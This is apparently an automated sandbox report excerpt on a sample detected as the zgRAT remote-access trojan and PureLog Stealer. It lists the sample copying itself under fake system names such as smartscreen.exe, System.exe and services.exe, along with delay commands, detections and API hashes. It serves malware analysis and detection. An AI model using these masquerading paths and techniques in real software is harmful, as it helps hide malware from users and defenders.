                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x630000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:34
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff7a72a0000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:35
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:36
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0xe60000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:37
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0x250000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:38
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Imagebase:0xa00000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:39
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Imagebase:0xf80000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:40
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:ping -n 10 localhost
                                                                                                    Imagebase:0x7ff6f3350000
                                                                                                    File size:22'528 bytes
                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:41
                                                                                                    Start time:08:52:10
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:42
                                                                                                    Start time:08:52:13
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0x410000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:44
                                                                                                    Start time:08:52:15
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x9e0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:45
                                                                                                    Start time:08:52:19
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                    File size:55'320 bytes
                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:46
                                                                                                    Start time:08:52:21
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0xc80000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:49
                                                                                                    Start time:08:52:31
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0xb90000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:50
                                                                                                    Start time:08:52:41
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                                    Imagebase:0x840000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:51
                                                                                                    Start time:08:52:49
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0xd70000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:52
                                                                                                    Start time:08:52:58
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x2d0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:53
                                                                                                    Start time:08:53:06
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x90000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:12
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 18481 7ffd9ba4d7ad 18482 7ffd9ba4d7bb SuspendThread 18481->18482 18484 7ffd9ba4d894 18482->18484 18473 7ffd9ba4f0e9 18474 7ffd9ba4f0f7 CloseHandle 18473->18474 18476 7ffd9ba4f1d4 18474->18476 18477 7ffd9ba51055 18478 7ffd9ba510a2 GetFileAttributesW 18477->18478 18480 7ffd9ba51135 18478->18480 18469 7ffd9ba4ef88 18470 7ffd9ba4ef9b ResumeThread 18469->18470 18472 7ffd9ba4f094 18470->18472
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fb65997b5001c93fc84794cb675850c33af5511056ffe88a06a7ed2429d29173
                                                                                                      • Instruction ID: 30453d11af9de37a2b06a9be6ba90dd02eac8357b0076a8b188d8590a114abc4
                                                                                                      • Opcode Fuzzy Hash: fb65997b5001c93fc84794cb675850c33af5511056ffe88a06a7ed2429d29173
                                                                                                      • Instruction Fuzzy Hash: B1A1F5B1A19A4D8FE798DB68C8657AEBFE1FF59310F4401BAD049D72D6CB782801C741

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$;#.$D$8A$L$8t
                                                                                                      • API String ID: 0-2189781871
                                                                                                      • Opcode ID: ae720dc11bbe11f4e3d6e1dafa42d0d5b195f2efa0e573efd5bec7f1ffbc2487
                                                                                                      • Instruction ID: 298161318f9339d9f7b3fc27e0ddbedaca9def2e2b07bae6210074a0a83dcadc
                                                                                                      • Opcode Fuzzy Hash: ae720dc11bbe11f4e3d6e1dafa42d0d5b195f2efa0e573efd5bec7f1ffbc2487
                                                                                                      • Instruction Fuzzy Hash: 09815E31B0E64A8FE7388F68947557577E0EF45391B1602BED48FC3196DE2ABB028742

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$L$8t$L$8t
                                                                                                      • API String ID: 0-3563103760
                                                                                                      • Opcode ID: c18793d416774921738c5d00cc22f676dade387d74af43c6486bbfd430bb074b
                                                                                                      • Instruction ID: ba7faaf77db7afa1fb4364eee42b2ef2694a15905e29bd0893afb33cb091ddf9
                                                                                                      • Opcode Fuzzy Hash: c18793d416774921738c5d00cc22f676dade387d74af43c6486bbfd430bb074b
                                                                                                      • Instruction Fuzzy Hash: B602D330B0EA4F8FE778CF68C4A157977A1FF44340B5106BEC44EC76A2DA2AB9498741

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$L$8t$L$8t
                                                                                                      • API String ID: 0-3563103760
                                                                                                      • Opcode ID: 8097a218f54fdbd6d28d3cad698c01bef4734ebed97af70e340a08c367840a8c
                                                                                                      • Instruction ID: 47dfbb493704c7d2dbe40e5c8ebb1d96951a2dcc178227d5fd1cade9ed219e66
                                                                                                      • Opcode Fuzzy Hash: 8097a218f54fdbd6d28d3cad698c01bef4734ebed97af70e340a08c367840a8c
                                                                                                      • Instruction Fuzzy Hash: 3E713630A0DA4A8FDB59DFA8C0B05A0B7A0FF05380F5542F9C44AC7697DB29B991CB81

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c9$!k9$"s9
                                                                                                      • API String ID: 0-3426396564
                                                                                                      • Opcode ID: bfa9802e8ee513d12ae7b371db97e6fbc031b75cf7b47e06cbb261a6c8cf690b
                                                                                                      • Instruction ID: cafc8d6c1653123c7014a2e77a6e89b72d30cecbe57b712550cf34fa9682c540
                                                                                                      • Opcode Fuzzy Hash: bfa9802e8ee513d12ae7b371db97e6fbc031b75cf7b47e06cbb261a6c8cf690b
                                                                                                      • Instruction Fuzzy Hash: 1821D136B2865ECFCB44EF5CE8406E9B7A0FB98369F55017BE849C3251D230A516CBC0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.
                                                                                                      • API String ID: 0-1113457991
                                                                                                      • Opcode ID: 1ebd9e3a23d1965ac716f9a7ef2ce589b2d6dc5fae7918f587a81c7eb6375e81
                                                                                                      • Instruction ID: 8e50606b2ada2f83bc71d3b21354f9043979ada6b73c33c4da3fda7baeceff62
                                                                                                      • Opcode Fuzzy Hash: 1ebd9e3a23d1965ac716f9a7ef2ce589b2d6dc5fae7918f587a81c7eb6375e81
                                                                                                      • Instruction Fuzzy Hash: C0014830B199099EDB28EB6490215F6B3D1EFA4394F50067BD00FC70E2DF29B5069780

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.
                                                                                                      • API String ID: 0-1113457991
                                                                                                      • Opcode ID: 33f6a52465cc5a9b69264761c09907da45035ddd3c7499e08a310fafd50011d7
                                                                                                      • Instruction ID: d45aea63f597fc3449d073f928f363ec84ac1060b7947900fd9a0a61a278396f
                                                                                                      • Opcode Fuzzy Hash: 33f6a52465cc5a9b69264761c09907da45035ddd3c7499e08a310fafd50011d7
                                                                                                      • Instruction Fuzzy Hash: F0014C3134550ACFE7149E58E0353F57391EF943A9F50027BE91EC71E1DB6BA6518B80

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: cc335d3f055004a16c838f6b609db374e13039f0c3e635a7d5f2bb8d0ac4f080
                                                                                                      • Instruction ID: bd90ca5cd321885c56de0330418d08b522ea8095668ee9c82d544752fe30d5cd
                                                                                                      • Opcode Fuzzy Hash: cc335d3f055004a16c838f6b609db374e13039f0c3e635a7d5f2bb8d0ac4f080
                                                                                                      • Instruction Fuzzy Hash: 26519A70A0C78C8FDB59DFA8D855AE8BBF0EF56310F0441ABD049D7292DA34A846CB01

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __common_dcos_data
                                                                                                      • String ID:
                                                                                                      • API String ID: 1949606188-0
                                                                                                      • Opcode ID: de7fb644923ac4304cb24a0f60197c243908cfdfbe3e5f93b0d100242ab66ce6
                                                                                                      • Instruction ID: a882c578c7ba95e18cfe0192e76d4a1b5112d205b7560bf2fd8507d7f092f079
                                                                                                      • Opcode Fuzzy Hash: de7fb644923ac4304cb24a0f60197c243908cfdfbe3e5f93b0d100242ab66ce6
                                                                                                      • Instruction Fuzzy Hash: DF510230A1D95E8EEBB89F9888707B877A1FF54311F5445B9D04EC71A6DEB87B808B01
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SuspendThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 3178671153-0
                                                                                                      • Opcode ID: 52599930966bf7782774aa99846a6104a489669c3323cf1690737e7703aa1788
                                                                                                      • Instruction ID: eabbf3ff38cb4d73d1626ec60fc2e9ec2af1d4e076fd5b1ed6edac35985bded8
                                                                                                      • Opcode Fuzzy Hash: 52599930966bf7782774aa99846a6104a489669c3323cf1690737e7703aa1788
                                                                                                      • Instruction Fuzzy Hash: CA412A70E0864C8FDB98DFA8D895BADBBF0EF5A310F10416AD049E7292DA74A845CF41
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 524c641dc4ef05cb91356e54de8e0ec8fb6e1ede2baca121aa81dd61328aa104
                                                                                                      • Instruction ID: 737d58e785535955b0934df8bf737d49a2f4b3eb873ffa37dcbd90579fea3c6d
                                                                                                      • Opcode Fuzzy Hash: 524c641dc4ef05cb91356e54de8e0ec8fb6e1ede2baca121aa81dd61328aa104
                                                                                                      • Instruction Fuzzy Hash: 45410A70A0861C8FDB98DF98D885BEDBBF0FB59310F10416ED409E7252DA70A846CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: 77de81b0217e65f2e202fdcd7792961f3b7782a19d9237f22703a8993b1574ba
                                                                                                      • Instruction ID: 8162ce45f68452fd9110aece8a4877612bba5ba195fec6fac2d9c5080d7ba380
                                                                                                      • Opcode Fuzzy Hash: 77de81b0217e65f2e202fdcd7792961f3b7782a19d9237f22703a8993b1574ba
                                                                                                      • Instruction Fuzzy Hash: F3B1E03061955A8FEB58CF98C0E15B437A1FF44390B6142FDC84B8B69BC639F982CB80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: 4a01496fe179ae08a6920753c7ce37bd5e2abf8cee22641573d47172b2389dc9
                                                                                                      • Instruction ID: 76f41533e1682022f9a348ab9ccbea2bc0d34ffa25df3d2b9d830ff7cb729284
                                                                                                      • Opcode Fuzzy Hash: 4a01496fe179ae08a6920753c7ce37bd5e2abf8cee22641573d47172b2389dc9
                                                                                                      • Instruction Fuzzy Hash: 5D71C531E1D64E8FEB65DFB48464BBD77A0EF45780F1102BBD00AC7195DE296A818741
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: d0c8968910cd5153f1fc8043d6250c3c81e8e0313c4be182ac03a9d9f7fb442a
                                                                                                      • Instruction ID: 6e29c6d7784b44fb376ee46571d5c8cc35e58380d7dbeb573772300ac9eb6ac9
                                                                                                      • Opcode Fuzzy Hash: d0c8968910cd5153f1fc8043d6250c3c81e8e0313c4be182ac03a9d9f7fb442a
                                                                                                      • Instruction Fuzzy Hash: 5A515D31E0A54E9BEB68DFD8C4615BCB7B1FF58380F1141BAD01AE72A6DA356A01CB40
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: e71504993ac59e79028aba53ea1ac4a5c4c3169c9a250838430e376535a3af70
                                                                                                      • Instruction ID: 9b2831a4dbbde26b2e77434866646fae18039da532db9c7fa24b57f2a4fe6130
                                                                                                      • Opcode Fuzzy Hash: e71504993ac59e79028aba53ea1ac4a5c4c3169c9a250838430e376535a3af70
                                                                                                      • Instruction Fuzzy Hash: FF415B70D0865C8FDB59DFA8D894BEDBBF0EF5A310F1041AAD449E7292DB74A885CB01
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: ed6da10d0643afb3e7bc8bbe3f2fa2c4be784d78b03044e85bf542301a5098e1
                                                                                                      • Instruction ID: e696fea18326f45a34aa0faff1469d0cd5491f902bf64c04f566e4cc60a68fb4
